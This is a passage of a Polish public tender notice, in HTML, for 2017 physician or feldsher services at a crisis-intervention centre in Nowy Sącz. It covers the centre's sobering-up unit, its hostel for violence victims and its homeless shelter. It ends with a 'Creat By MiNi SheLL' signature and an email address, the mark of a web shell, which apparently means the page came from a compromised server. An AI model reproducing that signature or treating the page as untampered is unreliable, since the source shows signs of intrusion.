13. Dokonanie oceny stanu zdrowia osób przyjmowanych  do hostelu dla ofiar przemocy 
 i do noclegowni dla osób bezdomnych   oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

14.  Sporządzanie raportu z przebiegu dyżurów z uwzględnieniem ilości przyjętych i wypisanych pacjentów oraz innych istotnych okoliczności i zdarzeń.

15. Wykonywanie innych niezbędnych czynności  medycznych.

16. Przestrzeganie tajemnicy służbowej i przepisów BHP, ppoż. obowiązujących w siedzibie Zamawiającego wraz z pełną odpowiedzialnością za ich realizację.

III. Niezależnie od wykonywania usług medycznych określonych w pkt II  Wykonawca 
zobowiązany jest w godz. 20.00 do 7.00 podejmować rozmowy telefoniczne z osobami potrzebującymi w danej chwili wsparcia oraz w razie potrzeby umawiać te osoby ze specjalistami, odnotowując ten fakt w książce raportów.

obejmuje wykonywanie przedmiotu zamówienia przez 1872  godziny 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku, w każdy poniedziałek  od godz. 19:00 do  środy do godz. 7:00. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85121100-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie zawodowe w zakresie pomocy osobom będącym w stanie nietrzeźwości</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Świadczenie usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej w okresie  od 01 stycznia do 31 grudnia w 2017 roku <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
I. Przedmiotem zamówienia jest świadczenie przez Wykonawcę będącego lekarzem lub felczerem usług medycznych w Sądeckim Ośrodku Interwencji Kryzysowej  w okresie od 01 stycznia 2017 r. do 31 grudnia 2017 r.
1. usług medycznych osobom nietrzeźwym, doprowadzonym do Sądeckiego Ośrodka Interwencji Kryzysowej  Działu Opieki Nad Osobami Nietrzeźwymi w Nowym Sączu zwanym dalej DONON, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2.zapewnienie  całodobowej opieki medycznej nad osobami doprowadzonymi do wytrzeźwienia w dziale DONON, 
3.ocena stanu zdrowia osób:
- przyjmowanych do hostelu dla osób znajdujących się w sytuacji ostrego kryzysu związanego z zagrożeniem zdrowia i życia oraz ofiar przemocy - Dział Wsparcia i Interwencji w Sytuacjach Kryzysowych, ul. Śniadeckich 10a, 33-300 Nowy Sącz
- przyjmowanych do noclegowni dla osób bezdomnych - Dział Readaptacji Społecznej, ul. Śniadeckich 10a, 33-300 Nowy Sącz, 
oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

II.  Do obowiązków Wykonawcy będzie należało przede wszystkim: 

1.  Udzielanie świadczeń zdrowotnych osobom doprowadzonym do wytrzeźwienia przez funkcjonariuszy Policji i strażników Straży Miejskiej, w zakresie wynikającym 
z rozporządzenia Ministra Zdrowia z dnia 08 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
2. Określanie i pisemne potwierdzanie dodatkowych symptomów wskazujących na stan nietrzeźwości, zgodnie z Rozporządzenia Ministra Zdrowia z dnia 8 grudnia 2014 r. 
w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),
3. Stwierdzenie po przeprowadzeniu badania  u osoby doprowadzonej czy:
a) istnieją medyczne przesłanki do umieszczenia osoby doprowadzonej w Dziale Opieki Nad Osobami Nietrzeźwymi  zwanym dalej DONON,  zastosowania pomocy doraźnej, która może być udzielona -w DONON, wykonania zabiegów higieniczno  sanitarnych, uwzględniając objawy stanu nietrzeźwości albo, 
b) istnieją medyczne przesłanki do skierowania do szpitala lub innego publicznego zakładu opieki zdrowotnej  uwzględniając objawy stanu nietrzeźwości osoby doprowadzonej oraz określenia  wskazań do hospitalizacji albo,
c) istnieje brak objawów stanu nietrzeźwości uzasadniających umieszczenie w DONON albo,
d) istnieje brak przeciwwskazań do umieszczenia w DONON.
	
4. Uwzględnienie przez Wykonawcę, iż nie przyjmuje się do DONON  osób doprowadzonych do wytrzeźwienia jeżeli: 
      a) stan zdrowia osoby doprowadzonej wg opinii Wykonawcy wymaga zastosowania środków, którymi Zamawiający nie dysponuje lub które powinny być zastosowane
w publicznym zakładzie opieki zdrowotnej przez lekarza specjalistę,
      b) brak jest wolnych miejsc w DONON.

5. Dokonanie koniecznych zabiegów medycznych do czasu wytrzeźwienia lub usunięcia skutków zatrucia alkoholem osób doprowadzonych do wytrzeźwienia.

6. Sprawowanie nadzoru medycznego nad osobami nietrzeźwymi do wytrzeźwienia
 i  przeprowadzanie w tym celu obchodu sal.

7. Podejmowanie decyzji o zastosowaniu przymusu bezpośredniego z zachowaniem zasad określonych art. 18 Ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego  
(t.j. Dz. U. z 2016 poz. 546 ), oraz przeprowadzenie każdorazowo badań po zastosowaniu pasów bezpieczeństwa.

8.  Pobieranie krwi na zawartość alkoholu zgodnie z Rozporządzeniem Ministra Zdrowia 
 z dnia 11 grudnia 2015 r. w sprawie badań na zawartość alkoholu w organizmie (Dz. U. 
 z  2015 poz 2153).

9. Przeprowadzenie z osobami zwalnianymi z DONON rozmów profilaktyczno  wychowawczych o szkodliwości nadużywania napojów alkoholowych.

10. Zastosowanie przez Wykonawcę, przed opuszczeniem przez osobę doprowadzoną do DONON, zabiegów medycznych, niezbędnych ze względu na stan zdrowia osoby doprowadzonej.

11.Prowadzenie przez Wykonawcę pełnej dokumentacji medycznej, zgodnie
 z rozporządzeniem Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień
i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850), oraz  Rozporządzeniem Ministra Zdrowia z dnia 9 listopada 2015 r.
w sprawie rodzajów i zakresu dokumentacji medycznej oraz sposobu jej przetwarzania 
(tj. Dz. U. z 2015 r. poz. 2069 z późn. zm.), a w szczególności:

a) sporządzanie przez Wykonawcę raportów z przebiegu dyżurów z uwzględnieniem liczby przyjętych osób, wydanych leków oraz wszystkich zaistniałych okoliczności podczas trwania dyżuru, 

b) wypełnianie przez Wykonawcę kart pobytu w DONON zgodnie z ustalonym wzorem obowiązek ten dotyczy zapisów stanu z przyjęcia i zwolnienia, oraz stanów i zachowań podczas pobytu, w tym zapisów określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),

12. Zgłaszanie przez Wykonawcę zapotrzebowania na brakujące w ambulatorium leki, środki opatrunkowe zgodnie z wykazem leków oraz sprzętu określonych w rozporządzeniu Ministra Zdrowia z dnia 8 grudnia 2014 r. w sprawie izb wytrzeźwień i placówek wskazanych lub utworzonych przez jednostkę samorządu terytorialnego (Dz.U. 2014, poz. 1850),. 

13. Dokonanie oceny stanu zdrowia osób przyjmowanych  do hostelu dla ofiar przemocy 
 i do noclegowni dla osób bezdomnych   oraz w razie zaistniałej potrzeby zapewnienie  doraźnej pomocy medycznej ww. osobom .

14.  Sporządzanie raportu z przebiegu dyżurów z uwzględnieniem ilości przyjętych i wypisanych pacjentów oraz innych istotnych okoliczności i zdarzeń.

15. Wykonywanie innych niezbędnych czynności  medycznych.

16. Przestrzeganie tajemnicy służbowej i przepisów BHP, ppoż. obowiązujących w siedzibie Zamawiającego wraz z pełną odpowiedzialnością za ich realizację.

III. Niezależnie od wykonywania usług medycznych określonych w pkt II  Wykonawca 
zobowiązany jest w godz. 20.00 do 7.00 podejmować rozmowy telefoniczne z osobami potrzebującymi w danej chwili wsparcia oraz w razie potrzeby umawiać te osoby ze specjalistami, odnotowując ten fakt w książce raportów.

Obejmuje wykonywanie przedmiotu zamówienia przez  2496 godzin 
w czasie trwania umowy tj. od dnia  01.01.2017 roku do dnia 31.12.2017 roku, w każdą środę  od godz. 07:00 do piątku do godz. 7:00. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>85121100-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie zawodowe w zakresie pomocy osobom będącym w stanie nietrzeźwosci</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com